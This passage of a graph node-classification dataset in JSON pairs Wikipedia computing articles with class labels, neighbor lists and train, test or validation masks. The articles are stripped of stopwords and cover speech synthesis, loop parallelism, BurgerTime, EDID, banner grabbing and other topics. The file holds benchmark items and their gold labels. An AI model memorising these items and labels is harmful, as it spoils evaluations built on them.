evolved fully supported program plaintalk people vision problems voiceover first time featured 2005 mac os x tiger 10.4 10.4 tiger first releases 10.5 leopard one standard voice shipping mac os x starting 10.6 snow leopard user choose wide range list multiple voices voiceover voices feature taking realistic-sounding breaths sentences well improved clarity high read rates plaintalk mac os x also includes say command-line based application converts text audible speech applescript standard additions includes say verb allows script use installed voices control pitch speaking rate modulation spoken text apple ios operating system used iphone ipad ipod touch uses voiceover speech synthesis accessibility third party applications also provide speech synthesis facilitate navigating reading web pages translating text second operating system feature advanced speech synthesis capabilities amigaos introduced 1985 voice synthesis licensed commodore international softvoice inc. also developed original macintalk text-to-speech system featured complete system voice emulation american english male female voices stress indicator markers made possible amiga audio chipset synthesis system divided translator library converted unrestricted english text standard set phonetic codes narrator device implemented formant model speech generation.. amigaos also featured high-level speak handler allowed command-line users redirect text output speech speech synthesis occasionally used third-party programs particularly word processors educational software synthesis software remained largely unchanged first amigaos release commodore eventually removed speech synthesis support amigaos 2.1 onward despite american english phoneme limitation unofficial version multilingual speech synthesis developed made use enhanced version translator library could translate number languages given set rules language modern windows desktop systems use sapi 4 sapi 5 components support speech synthesis speech recognition sapi 4.0 available optional add-on windows 95 windows 98 windows 2000 added narrator text–to–speech utility people visual impairment third-party programs jaws windows window-eyes non-visual desktop access supernova system access perform various text-to-speech tasks reading text aloud specified website email account text document windows clipboard user keyboard typing etc programs use speech synthesis directly programs use plug-ins extensions add-ons read text aloud third-party programs available read text system clipboard microsoft speech server server-based package voice synthesis recognition designed network use web applications call centers early 1980s ti known pioneer speech synthesis highly popular plug-in speech synthesizer module available ti-99/4 4a speech synthesizers offered free purchase number cartridges used many ti-written video games notable titles offered speech promotion alpiner parsec synthesizer uses variant linear predictive coding small in-built vocabulary original intent release small cartridges plugged directly synthesizer unit would increase device built vocabulary however success software text-to-speech terminal emulator ii cartridge cancelled plan text-to-speech tts refers ability computers read text aloud tts engine converts written text phonemic representation converts phonemic representation waveforms output sound tts engines different languages dialects specialized vocabularies available third-party publishers version 1.6 android added support speech synthesis tts currently number applications plugins gadgets read messages directly e-mail client web pages web browser google toolbar specialized software narrate rss-feeds one hand online rss-narrators simplify information delivery allowing users listen favourite news sources convert podcasts hand on-line rss-readers available almost pc connected internet users download generated audio files portable devices e.g help podcast receiver listen walking jogging commuting work growing field internet based tts web-based assistive technology e.g 'browsealoud uk company readspeaker deliver tts functionality anyone reasons accessibility convenience entertainment information access web browser non-profit project created 2006 provide similar web-based tts interface wikipedia work done context w3c w3c audio incubator group involvement bbc google inc open-source software systems available 2016 introduction adobe voco audio editing generating software prototype slated part adobe creative suite similarly enabled deepmind wavenet deep neural network based audio synthesis software google speech synthesis verging completely indistinguishable real human voice adobe voco takes approximately 20 minutes desired target speech generate sound-alike voice even phonemes present training material software poses ethical concerns allows steal peoples voices manipulate say anything desired increases stress disinformation situation coupled facts number markup languages established rendition text speech xml-compliant format recent speech synthesis markup language ssml became w3c recommendation 2004 older speech synthesis markup languages include java speech markup language jsml sable although proposed standard none widely adopted speech synthesis markup languages distinguished dialogue markup languages voicexml example includes tags related speech recognition dialogue management touchtone dialing addition text-to-speech markup speech synthesis long vital assistive technology tool application area significant widespread allows environmental barriers removed people wide range disabilities longest application use screen readers people visual impairment text-to-speech systems commonly used people dyslexia reading difficulties well pre-literate children also frequently employed aid severe speech impairment usually dedicated voice output communication aid speech synthesis techniques also used entertainment productions games animations 2007 animo limited announced development software application package based speech synthesis software finespeech explicitly geared towards customers entertainment industries able generate narration lines dialogue according user specifications application reached maturity 2008 nec biglobe announced web service allows users create phrases voices characters recent years text speech disability handicapped communication aids become widely deployed mass transit text speech also finding new applications outside disability market example speech synthesis combined speech recognition allows interaction mobile devices via natural language processing interfaces text-to speech also used second language acquisition voki instance educational tool created oddcast allows users create talking avatar using different accents emailed embedded websites shared social media addition speech synthesis valuable computational aid analysis assessment speech disorders voice quality synthesizer developed jorge c. lucero et al university brasilia simulates physics phonation includes models vocal frequency jitter tremor airflow noise laryngeal asymmetries synthesizer used mimic timbre dysphonic speakers controlled levels roughness breathiness strain",
    "neighbors": [
      1536,
      5122,
      5892,
      773,
      3335,
      2440,
      4744,
      2059,
      6797,
      6798,
      11538,
      1044,
      5399,
      2456,
      538,
      282,
      2590,
      2207,
      4768,
      3233,
      3874,
      8223,
      11042,
      6825,
      8234,
      9516,
      1581,
      7599,
      7983,
      4531,
      4662,
      3127,
      2488,
      6838,
      9787,
      10045,
      10557,
      6208,
      8644,
      11004,
      10750,
      6088,
      7164,
      5197,
      6223,
      8532,
      2901,
      214,
      2263,
      8538,
      10970,
      2525,
      479,
      1633,
      1890,
      5857,
      7780,
      2282,
      1899,
      6251,
      493,
      7918,
      8046,
      8688,
      5362,
      7283,
      10231,
      8440,
      3323,
      4092,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 3534,
    "label": 3,
    "text": "DOPIPE:dopipe dopipe parallelism method perform loop-level parallelism pipelining statements loop pipelined parallelism may exist different levels abstraction like loops functions algorithmic stages extent parallelism depends upon programmers ability make best use concept also depends upon factors like identifying separating independent tasks executing parallelly main purpose employing loop-level parallelism search split sequential tasks program convert parallel tasks without prior information algorithm parts data recurring consume significant amount execution time good candidates loop-level parallelism common applications loop-level parallelism found mathematical analysis uses multiple-dimension matrices iterated nested loops different kind parallelization techniques used basis data storage overhead degree parallelization data dependencies known techniques doall doacross dopipe doall technique used parallelize iteration loop without interaction iterations hence overall run-time gets reduced n serial processor execution time iteration since n iterations executed parallel doacross technique used wherever possibility data dependencies hence parallelize tasks manner data independent tasks executed parallel dependent ones executed sequentially degree synchronization used sync dependent tasks across parallel processors dopipe pipelined parallelization technique used programs element produced iteration consumed later iteration following example shows implement dopipe technique reduce total execution time breaking tasks inside loop executing pipelined manner breaking tasks takes place way dependencies within loop unidirectional i.e following iteration depend previous iteration program shows pseudocode dopipe parallelization code see three tasks f0 f1 f2 inside loop iterating codice_1 1 codice_2 following list dependencies code f1 j → f1 j+1 implies statement f1 iteration codice_3 must executed statement f1 iteration codice_1 also known true dependency f1 j → f2 j implies statement f2 iteration codice_1 must executed statement f1 iteration codice_1.if code would executed sequentially total time consumed would equal n denote execution time functions f0 f1 f2 respectively per iteration parallelize loop pipelining statements inside loop following manner since f0 independent function i.e loop-carried dependency dependence codice_3 codice_8 iterations neither dependency across statements loop hence completely separate function run parallelly using doall parallelism hand statements f1 f2 dependent explained therefore split two different loops execute pipelined fashion use codice_9 codice_10 synchronize f1 f2 loops starting first iteration codice_1 statement f1 gets executed time meanwhile f2 getting executed since waiting value codice_12 produced f1 f1 completes execution iteration codice_1 posts value using codice_9 waiting f1 execution using codice_10 f2 starts execution since value codice_12 available use also since f1 execution restricted f2 hence f1 executes codice_3 simultaneously figure shows execution timeline statements figure see total time execute f0 since iterations f0 executed parallel f1 f2 total execution time equal n considering negligible synchronization time considerably less time obtained sequential execution doall parallelism mainly works principle divide conquer tasks run different iterations use unique set data problem implementation large amount data works computed together large cache space needed work different threads since dependencies threads overhead inter thread communication dopipe synchronization overhead threads due pipelined structure requires less cache space data produced immediately consumed consumer",
    "neighbors": [
      8523,
      2339
    ],
    "mask": "Test"
  },
  {
    "node_id": 3535,
    "label": 2,
    "text": "Snipping_Tool:snipping tool snipping tool microsoft windows screenshot utility included windows vista later take still screenshots open window rectangular areas free-form area entire screen snips annotated using mouse tablet stored image file png gif jpeg file mhtml file e-mailed snipping tool allows basic image editing snapshot different colored pens eraser highlighter windows vista snipping tool included experience pack windows xp tablet pc edition 2005 originally released powertoy microsoft tablet pc launch november 7 2002 windows 10 adds new delay function allows timed capture screenshots replaced snip sketch windows 10 october 2018 update still available october 2018 update microsoft says removed future update delay function valuable taking screenshot showing context menus handles appear around graphic object object selected without delay feature would possible take screenshot showing context menus object handles disappear item snipping tool clicked use delay feature one opens snipping tool sets delay seconds delay one opens context menu selects object handles appear waits delay lapse end delay snipping tool automatically becomes active without user click therefore context menu object handles disappear screenshot taken",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      3719,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      4316,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      3463,
      1418,
      5003,
      5004,
      8080,
      4505,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 3536,
    "label": 3,
    "text": "BurgerTime:burgertime united states data east usa licensed burgertime distribution bally midway standard dedicated arcade game data east also released version burgertime united states deco cassette system data east midway versions distinguished manufacturer name title screen marquee cabinet artworks game identical game original japanese title changed outside japan burgertime reportedly avoid potential trademark issues addition releases western world burgertime also name used japanese ports sequels data east went bankrupt 2003 g-mode bought data east intellectual properties including burgertime burgertime deluxe super burgertime peter pepper ice cream factory object game complete number hamburgers avoiding enemy foods player controls protagonist chef peter pepper four-position joystick button board consists maze planks ladders giant burger ingredients buns patties lettuce/tomato etc laid peter walks full length ingredient falls level knocking ingredient happens burger completed vertically aligned ingredients dropped maze onto waiting plate player must complete burgers finish board three types enemy food items wander maze mr hot dog mr. pickle mr egg player score extra points either crushing falling ingredient dropping ingredient standing latter case ingredient falls two extra levels every enemy caught crushed dropped enemies return maze short time start game player given limited number pepper shots use enemies pressing button causes peter shake cloud pepper direction facing enemy touching cloud stunned seconds peter safely move bonus food items coffee ice cream appear occasion awarding bonus points one extra pepper shot collected six boards increasing difficulty burgers/ingredients enemies and/or layouts make easier peter become cornered enemies player completes sixth board cycle repeats player loses one life whenever peter touches non-stunned enemy lives lost game mattel electronics obtained rights burgertime data east released intellivision version 1983 year also released versions atari 2600 ibm pc apple ii aquarius 1984 mattel produced colecovision version distributed coleco data east produced version ti-99/4a 1983 famicom 1985 msx 1986 nes 1987 burgertime received certificate merit category 1984 videogame year less 16k rom 5th annual arkie awards deseret news called burgertime one real surprises 1983 intellivision gave colecovision version three one half stars arcade spin-off peter pepper ice cream factory 1984 arcade sequel 1990 widely released super burgertime stars peter pepper jr. allows two players play fairly true original many added features greatly improved graphics console-only sequel diner created 1984 purchase intellivision mattel intv corp programmed ray kaestner programmer intellivision version burgertime diner peter pepper must kick balls food roll platforms ramps land large plate bottom screen avoiding crushing enemy food items trying stop burgertime deluxe released game boy 1991 namco released burgertime delight mobile devices 2007 includes new graphics characters power-ups six arcade levels eight enhanced mode levels perils falling ice rising fire grill besides pepper classic game salt shaker collected stuns enemies screen 3d update burgertime world tour released 2011 xbox live arcade playstation network 2012 wiiware delisted xbox live arcade april 30 2014 arcade version burgertime included various collections including arcade greatest hits midway collection 2 playstation data east arcade classics wii nes version available wii virtual console burgertime deluxe released 3ds virtual console 2011 nes version also included 2017 compilation data east all-star collection nintendo entertainment system clones home systems include mr. wimpy burger chase burger time interceptor micros burgerspace chip factory burger boy basic burger barmy burgers burger builder lunchtime peter pepper appeared movies wreck-it ralph pixels elements burgertime episode gameboy 1984 billy mitchell achieved record score 7,881,050 beaten september 5 2005 bryan l. wagner turbotville pennsylvania score 8,601,300 improved exactly 9,000,000 june 2 2006 according twin galaxies improved 11,512,500 points september 19 2008 challenge arcade wyomissing pennsylvania mame world record verified twin galaxies december 2 2016 7,837,750 roger edwin blair iii mountain city tennessee",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3537,
    "label": 2,
    "text": "Mobile_Internet_device:mobile internet device mobile internet device mid multimedia-capable mobile device providing wireless internet access designed provide entertainment information location-based services personal business use allow 2-way communication real-time sharing described filling niche smartphones tablet computers features mid started becoming available smartphones tablets term mostly used refer low-end well high-end tablets form factor mobile internet tablets archos similar lenovo image right class included multiple operating systems windows ce windows 7 android android tablet uses arm cortex cpu touchscreen intel announced prototype mid intel developer forum spring 2007 beijing mid development kit sophia systems using intel centrino atom announced april 2008 intel mid platforms based intel processor chipset consume less power x86 derivatives platforms announced listed intel first generation mid platform codenamed mccaslin contains 90 nm intel a100/a110 processor codenamed stealey runs 600–800 mhz 2 march 2008 intel introduced intel atom processor brand new family low-power processor platforms components thin small designs work together enable best mobile computing internet experience mobile low-power devices intel second generation mid platform codenamed menlow contains 45 nm intel atom processor codenamed silverthorne run 2.0 ghz system controller hub codenamed poulsbo includes intel hd audio codenamed azalia platform initially branded centrino atom practice discontinued q3 2008 intel third generation mid/smartphone platform codenamed moorestown contains 45 nm intel atom processor codenamed lincroft 65 nm platform controller hub codenamed langwell since memory controller graphics controller integrated processor northbridge removed processor communicates directly southbridge via dmi bus interface intel fourth generation mid/smartphone platform codenamed medfield contains 32 nm intel atom soc codenamed penwell intel mid/smartphone platform codenamed clover trail+ based clover trail tablet platform contains 32 nm intel atom soc codenamed cloverview intel fifth generation mid/smartphone platform codenamed merrifield contains 22 nm intel atom soc codenamed tangier intel sixth generation mid/smartphone platform codenamed moorefield contains 22 nm intel atom soc codenamed anniedale intel seventh generation mid/smartphone platform codenamed morganfield contains 14 nm intel atom soc codenamed broxton intel announced collaboration ubuntu create ubuntu mobile internet devices distribution known ubuntu mobile ubuntu website said new distribution provide rich internet experience users intel ’ 2008 mobile internet device mid platform",
    "neighbors": [
      4491,
      7309,
      9101,
      10768,
      7313,
      6804,
      9369,
      8090,
      9500,
      5681,
      10675,
      1083,
      8125,
      1471,
      833,
      9541,
      1480,
      2635,
      3537,
      2514,
      9042,
      2516,
      6618,
      3162,
      4444,
      2525,
      3294,
      7387,
      8035,
      3300,
      7783,
      8044,
      9582,
      10223,
      5369,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 3538,
    "label": 2,
    "text": "Microsoft_JhengHei:microsoft jhenghei microsoft jhenghei 微軟正黑體 sans-serif typeface included windows vista later microsoft office 2007 follows standard form national characters prescribed ministry education republic china taiwan intended used traditional chinese language environments using cleartype version microsoft jhenghei alternate character design versions microsoft jhenghei microsoft jhenghei ui respectively sold monotype family includes light version font microsoft jhenghei tc light microsoft jhenghei ui tc light downloading installing traditional chinese cleartype fonts windows xp microsoft also makes microsoft jhenghei available windows xp microsoft jhenghei ui included windows 8 later",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      6797,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3539,
    "label": 4,
    "text": "Banner_grabbing:banner grabbing banner grabbing technique used gain information computer system network services running open ports administrators use take inventory systems services network however intruder use banner grabbing order find network hosts running versions applications operating systems known exploits examples service ports used banner grabbing used hyper text transfer protocol http file transfer protocol ftp simple mail transfer protocol smtp ports 80 21 25 respectively tools commonly used perform banner grabbing telnet nmap zmap netcat example one could establish connection target web server using netcat send http request response typically contain information service running host information may used administrator catalog system intruder narrow list applicable exploits prevent network administrators restrict access services networks shut unused unnecessary services running network hosts shodan search engine banners grabbed portscanning internet",
    "neighbors": [
      11202,
      7364,
      11112,
      3473,
      4369,
      2739,
      9909
    ],
    "mask": "Test"
  },
  {
    "node_id": 3540,
    "label": 3,
    "text": "PowerPC_e600:powerpc e600 powerpc e600 family 32-bit powerpc microprocessor cores developed freescale primary use high performance system-on-a-chip soc designs speed ranging 2 ghz thus making ideal high performance routing telecommunications applications e600 continuation powerpc 74xx design e600 superscalar out-of-order risc core 32/32 kb l1 data/instruction caches seven-stage three-issue pipeline load/store system register powerful branch prediction integer unit double precision fpu enhanced 128-bit altivec unit limited out-of-order execution core designed work multiprocessing multi core designs take large amounts l2 caches die e600 core completely backwards compatible powerpc 74xx cores derives 2004 freescale renamed powerpc 74xx core e600 changed focus general cpus high end embedded soc devices introduced new naming scheme mpc86xx 7448 last pure 74xx formed base new e600 core 7448 evolution powerpc 7447 essentially faster 2 ghz power-efficient version 7447a manufactured 90 nm 1 mb l2 cache 200 mhz front side bus features freescale new standard core e600 problems associated bandwidth-constrained external mpx bus interface found 74xx series relieved single mpc8641 dual mpc8641d e600 cores faster system interface via rapidio dual x8 pci express on-die 667 mhz mpx interconnect i/o cores dual 64-bit ddr2-memory controllers ecc product also features four on-chip gigabit ethernet controllers tcp/udp offloading features dual core mpc8641d support asymmetric multiprocessing enables two operating systems run device simultaneously sharing resources largely unaware mpc8641 single core mpc8641d dual core manufactured 90 nm soi based process 8641 draws less 16w 1.33 ghz 8641d less 25w 1.5 ghz introduced summer 2008 mpc8640 mpc8640d low power low cost versions mpc8641 parts clocked 1-1.25 ghz draw 14-21w power identical older brethren respects introduced 2007 mpc8610 host processor integrated graphics processor supporting 24-bit screens sizes 1280x1024 pixels single core cpu 256 kb die l2 cache manufactured 90 nm process reaches speeds 667 1333 mhz list complete list known core e600 based designs excluding older 74xx designs pictures illustrations scale",
    "neighbors": [
      6663,
      5642,
      1548,
      2073,
      1563,
      8231,
      11314,
      8761,
      6715,
      9302,
      1635,
      7269,
      3185,
      4211,
      5235,
      630,
      7286,
      7299,
      1158,
      4743,
      7302,
      7305,
      11413,
      6815,
      6311,
      10924,
      9391,
      5297,
      11447,
      1725,
      10945,
      6878,
      8931,
      10985,
      9964,
      3319,
      6914,
      3844,
      4868,
      3846,
      10501,
      6926,
      6415,
      4881,
      1309,
      6949,
      1321,
      7983,
      10543,
      9020,
      336,
      8530,
      342,
      3932,
      11613,
      3936,
      869,
      8048,
      4465,
      8058,
      3467,
      1933,
      3472,
      7065,
      10658,
      3493,
      8102,
      4017,
      1461,
      8120,
      1983,
      1985,
      10180,
      3017,
      10214,
      10734,
      10224,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3541,
    "label": 1,
    "text": "TOra:tora tora toolkit oracle free software database development administration gui available gnu general public license features pl/sql debugger sql worksheet syntax highlighting database browser comprehensive set database administration tools addition oracle database support support mysql postgresql teradata databases added since initial launch uses qt use qscintilla2 library oracle connector uses oracle template library tora originally written henrik johnson copyright globecom ab acquired quest software start conversion maintained open source project made 2005-02-17 version 1.3.15 qt4 conversion took place 2009 version 1.4",
    "neighbors": [
      10340,
      10413,
      7022,
      2901,
      9177,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 3542,
    "label": 2,
    "text": "B2G_OS:b2g os b2g os community-developed successor firefox os developed mozilla foundation follows firefox os vision providing complete community-based alternative operating system runs software web applications software 'applications therefore use open web standards programming languages javascript html5 robust privilege model open web apis communicate directly device hardware basis kaios jan 2019 17 percent indian mobile phone market third popular phone os kaios closed-source b2g os forked firefox os following mozilla decision discontinue support mobile operating system decision made according ari jaaksi david bryant order evolve quickly enable substantial new architectural changes gecko mozilla ’ platform engineering organization needs remove b2g-related code mozilla-central 2017 b2g os longer maintained",
    "neighbors": [
      6276,
      3462,
      11271,
      3089,
      10393,
      6301,
      5406,
      4383,
      673,
      3626,
      7727,
      7857,
      7991,
      9784,
      1083,
      7483,
      5824,
      7234,
      7492,
      11079,
      2001,
      2259,
      7253,
      3162,
      607,
      10080,
      2658,
      10215,
      3561,
      6763,
      6508,
      2925,
      9964,
      495,
      8316,
      499,
      1524,
      5363,
      5369,
      7804,
      8829,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 3543,
    "label": 3,
    "text": "Bounder_(video_game):bounder video game courses composed numerous tiles suspended high ground ball must bounced past walls enemies coming contact either plummeting edge course results loss one player seven lives courses feature power squares push tennis ball forward allow longer jumps must utilized complete course power squares also used enable tennis ball reach mystery spaces tiles question marks contain extra lives bonus jumps used bonus screens mystery spaces also destroy tennis ball resulting loss life instant destruction freezing ball place missile flies across play area explodes bonus screen accessed every time course completed consists mystery spaces increase player score bounced player receive 40 bounces allowed bonus screen though figure increased player uncovering mystery squares preceding course bounces used mystery spaces bounced play moves next course bouncing mystery spaces awards player 10,000 points well extra life bounder received gold medal award commodore 64 magazine zzap 64 well sinclair mega game award remake bounder released mobile game swivel creations may 2019",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3544,
    "label": 4,
    "text": "National_Cyber_Investigative_Joint_Task_Force:national cyber investigative joint task force national cyber investigative joint task force ncijtf officially established 2008 ncijtf comprises 20 partnering agencies across law enforcement intelligence community department defense representatives co-located work jointly accomplish organization ’ mission since 2008 ncijtf primary american agency responsible coordinating cyber threats investigations liaisons central intelligence agency cia department defense dod department homeland security dhs national security agency nsa multi-agency cyber center ncijtf coordinates integrates shares information support cyber threat investigations supply support intelligence analysis community decision-makers support efforts fight cyber threats task force uses collective resources members collaborates international private sector partners bring available resources bear domestic cyber threats perpetrators",
    "neighbors": [
      1888,
      2148,
      7887,
      4625,
      10290
    ],
    "mask": "Test"
  },
  {
    "node_id": 3545,
    "label": 8,
    "text": "Jetty_(web_server):jetty web server eclipse jetty java http web server java servlet container web servers usually associated serving documents people jetty often used machine machine communications usually within larger software frameworks jetty developed free open source project part eclipse foundation web server used products apache activemq alfresco scalatra apache geronimo apache maven apache spark google app engine eclipse fuse idempiere twitter streaming api zimbra jetty also server open source projects lift eucalyptus opennms red5 hadoop i2p jetty supports latest java servlet api jsp support well protocols http/2 websocket jetty started independent open source project 1995 2009 jetty moved eclipse jetty provides web services embedded java application already component eclipse ide supports ajp jaspi jmx jndi osgi websocket java technologies originally developed software engineer greg wilkins jetty originally http server component mort bay server originally called issuetracker original application mbservler mort bay servlet server neither much liked jetty finally picked jetty started 1995 hosted mortbay creating version 1.x 2.x 2000 2000 2005 jetty hosted sourceforge.net version 3.x 4.x 5.x produced 2005 entire jetty project moved codehaus.org 2009 core components jetty moved eclipse.org codehaus.org continued provide integrations extensions packaging jetty versions 7.x 8.x 9.x 2016 main repository jetty moved github still developed eclipse ip process documentation",
    "neighbors": [
      1920,
      9987,
      4485,
      7430,
      6153,
      9229,
      7567,
      16,
      1937,
      7695,
      7443,
      1556,
      8350,
      8096,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      5677,
      11693,
      7983,
      10800,
      11439,
      6067,
      6579,
      5048,
      6714,
      64,
      2880,
      5314,
      10622,
      1991,
      4171,
      11134,
      595,
      1363,
      4439,
      225,
      865,
      1250,
      2404,
      4837,
      7777,
      3560,
      8810,
      6379,
      5612,
      9580,
      9834,
      2287,
      9455,
      11376,
      3966,
      8691,
      10611,
      11386,
      3710
    ],
    "mask": "Test"
  },
  {
    "node_id": 3546,
    "label": 4,
    "text": "TeleSign:telesign telesign corporation communications platform service company founded security based los angeles california founded 2005 darren berkovitz ryan disraeliand stacy stubblefield company mainly provides two-factor authentication services secure supplementary method preventing illicit access online accounts used many companies like itunes yahoo gmail outlook twitter facebook bank america chase discover paypal etsy salesforce company also offers variety cloud communications apis via self-service portal ryan disraeli current ceo company along co-founders disraeli stubblefield berkowitz named usc alumni entrepreneurs year telesign early project technology incubator curious minds company raised 49 million funds april 2017 telesign announced acquired bics belgium-based company 230 million",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3547,
    "label": 3,
    "text": "Hardware_performance_counter:hardware performance counter computers hardware performance counters hardware counters set special-purpose registers built modern microprocessors store counts hardware-related activities within computer systems advanced users often rely counters conduct low-level performance analysis tuning number available hardware counters processor limited cpu model might lot different events developer might like measure counter programmed index event type monitored like l1 cache miss branch misprediction one first processors implement counter associated instruction codice_1 access intel pentium documented terje mathisen wrote article reverse engineering byte july 1994 following table shows examples cpus number available hardware counters compared software profilers hardware counters provide low-overhead access wealth detailed performance information related cpu functional units caches main memory etc another benefit using source code modifications needed general however types meanings hardware counters vary one kind architecture another due variation hardware organizations difficulties correlating low level performance metrics back source code limited number registers store counters often force users conduct multiple measurements collect desired performance metrics modern superscalar processors schedule execute multiple instructions out-of-order one time in-flight instructions retire time depending memory access hits cache stalls pipeline many factors cause performance counter events attributed wrong instructions making precise performance analysis difficult impossible amd introduced methods mitigate drawbacks example opteron processors implemented 2007 technique known instruction based sampling ibs amd implementation ibs provides hardware counters fetch sampling front superscalar pipeline op sampling back pipeline results discrete performance data associating retired instructions parent amd64 instruction",
    "neighbors": [
      11424,
      7745,
      9505,
      9637,
      3846,
      9911,
      6924,
      1005,
      6926,
      1776,
      7601,
      659,
      7134,
      11062,
      1399,
      1915,
      638,
      6815
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3548,
    "label": 3,
    "text": "Extended_Display_Identification_Data:extended display identification data extended display identification data edid metadata format display devices describe capabilities video source e.g graphics card set-top box data format defined standard published video electronics standards association vesa edid data structure includes manufacturer name serial number product type phosphor filter type timings supported display display size luminance data digital displays pixel mapping data displayid vesa standard targeted replace edid e-edid extensions uniform format suited pc monitor consumer electronics devices edid structure versions range v1.0 v1.4 define upwards-compatible 128-byte structures version 2.0 defined new 256-byte structure deprecated replaced v1.3 supports multiple extension blocks hdmi versions 1.0–1.3c use edid structure v1.3 display data channel ddc edid defined standard way graphics card know kind display device connected vga connectors personal computers provided basic form identification connecting one two three pins ground coding standardized channel transmitting edid display graphics card usually i²c-bus defined ddc2b ddc1 used different serial format never gained popularity edid often stored monitor memory device called serial prom programmable read-only memory eeprom electrically erasable prom accessible via i²c-bus address edid prom often read host pc even display turned many software packages read display edid information read-edid linux dos powerstrip microsoft windows xfree86 linux bsd unix mac os x natively reads edid information programs switchresx displayconfigx display information well use define custom resolutions enhanced edid introduced time e-ddc introduced edid structure version 1.3 supports multiple extensions blocks deprecated edid version 2.0 structure although supported extension data fields preferred timing range limits monitor name required e-edid e-edid also supports dual gtf timings aspect ratio change use extensions e-edid string lengthened 32 kbytes graphics card drivers historically coped poorly edid using standard timing descriptors rather detailed timing descriptors dtds even cases dtds read drivers are/were still often limited standard timing descriptor limitation horizontal/vertical resolutions must evenly divisible 8 means many graphics cards express native resolutions common wide screen flat panel displays liquid crystal display televisions number vertical pixels calculated horizontal resolution selected aspect ratio fully expressible size wide screen display must thus multiple 16×9 pixels 1366×768 pixel wide xga panels nearest resolution expressible edid standard timing descriptor syntax 1360×765 pixels typically leading 3 pixel thin black bars specifying 1368 pixels screen width would yield unnatural screen height 769.5 pixels many wide xga panels advertise native resolution standard timing descriptors instead offering resolution 1280×768 panels advertise resolution slightly smaller native 1360×765 panels able show pixel perfect image edid data must ignored display driver driver must correctly interpret dtd able resolve resolutions whose size divisible 8 special programs available override standard timing descriptors edid data even always possible vendors graphics drivers notably intel require specific registry hacks implement custom resolutions make difficult use screen native resolution used another descriptor pixel clock bytes set 0 currently defined descriptor types cea edid timing extension first introduced eia/cea-861 since updated several times notably −861b revision version 3 extension adding short video descriptors advanced audio capability/configuration information −861d published july 2006 containing updates audio segments −861e −861f published june 4 2013 according brian markwalter senior vice president research standards cea −861f includes number noteworthy enhancements including support several new ultra hd widescreen video formats additional colorimetry schemes. ” recent version cta-861-g originally published november 2016 made available free november 2017 necessary changes due trademark complaint version 1 defined −861 allowed specification video timings use 18-byte detailed timing descriptors dtd detailed edid 1.3 data format cases preferred timing first dtd listed cea edid timing extension version 2 defined −861a added capability designate number dtds native also included basic discovery functionality whether display device contains support basic audio ycbcr pixel formats underscan version 3 −861b spec allows two different ways specify timings available digital tv formats version 1 2 use 18-byte dtds use short video descriptor svd see hdmi 1.0–1.3c uses version version 3 also includes four new optional types data blocks video data blocks containing aforementioned short video descriptor svd audio data blocks containing short audio descriptors sad speaker allocation data blocks containing information speaker configuration display device vendor specific data blocks contain information specific given vendor use data block collection contains one data blocks detailing video audio speaker placement information display blocks placed order initial byte block defines type length one data block ended next byte assumed beginning next data block case byte designated byte 2 dtds known begin audio data blocks contain one 3-byte short audio descriptors sads sad details audio format channel number bitrate/resolution capabilities display follows video data blocks contain one 1-byte short video descriptors svds notes parentheses indicate instances pixels repeated meet minimum speed requirements interface example 720x240p case pixels line double-clocked 2880 x480i case number pixels line thus number times repeated variable sent dtv monitor source device increased hactive expressions include “ 2x ” “ 4x ” indicate two four times reference resolution respectively video modes vertical refresh frequency multiple 6hz i.e 24 30 60 120 240hz considered timing equivalent ntsc modes vertical refresh adjusted factor 1000/1001 vesa dmt specifies 0.5 pixel clock tolerance 5 times required change pixel clocks adjusted maintain ntsc compatibility typically 240p 480p 480i modes adjusted 576p 576i hdtv formats vendor specific data block contains first three bytes vendor ieee 24-bit registration number lsb first hdmi always hdmi licensing llc followed two byte source physical address lsb first source physical address provides cec physical address upstream cec devices remainder vendor specific data block data payload anything vendor considers worthy inclusion edid extension block hdmi 1.3a specifies requirements data payload see spec detailed info bytes speaker allocation data block present consist three bytes second third reserved first contains information speakers present display device",
    "neighbors": [
      9057,
      4741,
      9321,
      823,
      6510,
      6797,
      11631,
      2706,
      4567,
      3548,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 3549,
    "label": 4,
